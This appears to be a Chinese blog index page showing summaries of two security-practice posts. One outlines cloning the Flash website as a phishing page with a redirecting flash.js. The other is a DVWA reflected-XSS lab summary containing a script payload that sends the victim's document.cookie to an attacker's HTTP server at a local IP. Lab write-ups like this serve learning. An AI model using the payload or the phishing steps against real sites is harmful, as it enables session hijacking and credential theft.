2025年3月4日
flash 钓鱼
摘要: 访问真实的flash 网站页面,点击查看网页源代码并将所有代码复制下来保存到index.html 2.检查并修改源代码链接。搜索href和src,将链接修改为可以访问的形式 3.新建 flash.js 文件,内容为(其中的 window.location.href 的值修改为 index.html的 阅读全文
posted @ 2025-03-04 15:42 小圣爱学习 阅读(37) 评论(0) 推荐(0)
dvwa xss reflected (low)
摘要: 开启一个简易的http服务(我用了kali) 2.插入Payload <script> window.open('http://192.168.1.105:1234/?cookie='+btoa(document.cookie)) </script> 3.受害者访问攻击者插入xss代码的网页,浏览器 阅读全文
posted @ 2025-03-04 00:13 小圣爱学习 阅读(18) 评论(0) 推荐(0)